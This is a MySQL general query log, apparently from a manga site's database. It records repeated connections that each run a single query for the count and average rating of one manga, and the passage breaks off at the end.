330651640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330651640 Quit 330651641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330651641 Quit 330651642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330651642 Quit 330651643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330651643 Quit 330651644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330651644 Quit 330651645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330651645 Quit 330651646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330651646 Quit 330651647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330651647 Quit 330651648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330651648 Quit 330651649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330651649 Quit 330651650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330651650 Quit 330651651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330651651 Quit 330651652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330651652 Quit 330651653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330651653 Quit 330651654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330651654 Quit 330651655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330651655 Quit 330651656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330651656 Quit 330651657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330651657 Quit 330651658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330651658 Quit 330651659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330651659 Quit 330651660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330651660 Quit 330651661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330651661 Quit 330651662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330651662 Quit 330651663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330651663 Quit 330651664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330651664 Quit 330651665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330651665 Quit 330651666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330651666 Quit 330651667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330651667 Quit 330651668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330651668 Quit 330651669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330651669 Quit 330651670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330651670 Quit 330651671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330651671 Quit 330651672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330651672 Quit 330651673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330651673 Quit 330651674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330651674 Quit 330651675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330651675 Quit 330651676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330651676 Quit 330651677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330651677 Quit 330651678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330651678 Quit 330651679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330651679 Quit 330651680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330651680 Quit 330651681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330651681 Quit 330651682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330651682 Quit 330651683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330651683 Quit 330651684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330651684 Quit 330651685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330651685 Quit 330651686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330651686 Quit 330651687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330651687 Quit 330651688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330651688 Quit 330651689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330651689 Quit 330651690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330651690 Quit 330651691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330651691 Quit 330651692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330651692 Quit 330651693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330651693 Quit 330651694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330651694 Quit 330651695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330651695 Quit 330651696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330651696 Quit 330651697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330651697 Quit 330651698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330651698 Quit 330651699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330651699 Quit 330651700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330651700 Quit 330651701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330651701 Quit 330651702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330651702 Quit 330651703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330651703 Quit 330651704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330651704 Quit 330651705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330651705 Quit 330651706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330651706 Quit 330651707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330651707 Quit 330651708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330651708 Quit 330651709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330651709 Quit 330651710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330651710 Quit 330651711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330651711 Quit 330651712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330651712 Quit 330651713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330651713 Quit 330651714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330651714 Quit 330651715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330651715 Quit 330651716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330651716 Quit 330651717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330651717 Quit 330651718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330651718 Quit 330651719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330651719 Quit 330651720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330651720 Quit 330651721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330651721 Quit 330651722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330651722 Quit 330651723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330651723 Quit 330651724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330651724 Quit 330651725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330651725 Quit 330651726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330651726 Quit 330651727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330651727 Quit 330651728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330651728 Quit 330651729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330651729 Quit 330651730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330651730 Quit 330651731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330651731 Quit 330651732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330651732 Quit 330651733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330651733 Quit 330651734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330651734 Quit 330651735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330651735 Quit 330651736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330651736 Quit 330651737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330651737 Quit 330651738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330651738 Quit 330651739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330651739 Quit 330651740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330651740 Quit 330651741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330651741 Quit 330651742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330651742 Quit 330651743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330651743 Quit 330651744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330651744 Quit 330651745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330651745 Quit 330651746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330651746 Quit 330651747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330651747 Quit 330651748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330651748 Quit 330651749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330651749 Quit 330651750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330651750 Quit 330651751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330651751 Quit 330651752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330651752 Quit 330651753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330651753 Quit 330651754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330651754 Quit 330651755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330651755 Quit 330651756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330651756 Quit 330651757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330651757 Quit 330651758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330651758 Quit 330651759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330651759 Quit 330651760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330651760 Quit 330651761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330651761 Quit 330651762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330651762 Quit 330651763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330651763 Quit 330651764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330651764 Quit 330651765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330651765 Quit 330651766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330651766 Quit 330651767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330651767 Quit 330651768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330651768 Quit 330651769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330651769 Quit 330651770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330651770 Quit 330651771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330651771 Quit 330651772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330651772 Quit 330651773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330651773 Quit 330651774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330651774 Quit 330651775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330651775 Quit 330651776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330651776 Quit 330651777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330651777 Quit 330651778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330651778 Quit 330651779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330651779 Quit 330651780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330651780 Quit 330651781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330651781 Quit 330651782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330651782 Quit 330651783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330651783 Quit 330651784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330651784 Quit 330651785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330651785 Quit 330651786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330651786 Quit 330651787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330651787 Quit 330651788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330651788 Quit 330651789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330651789 Quit 330651790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330651790 Quit 330651791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330651791 Quit 330651792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330651792 Quit 330651793 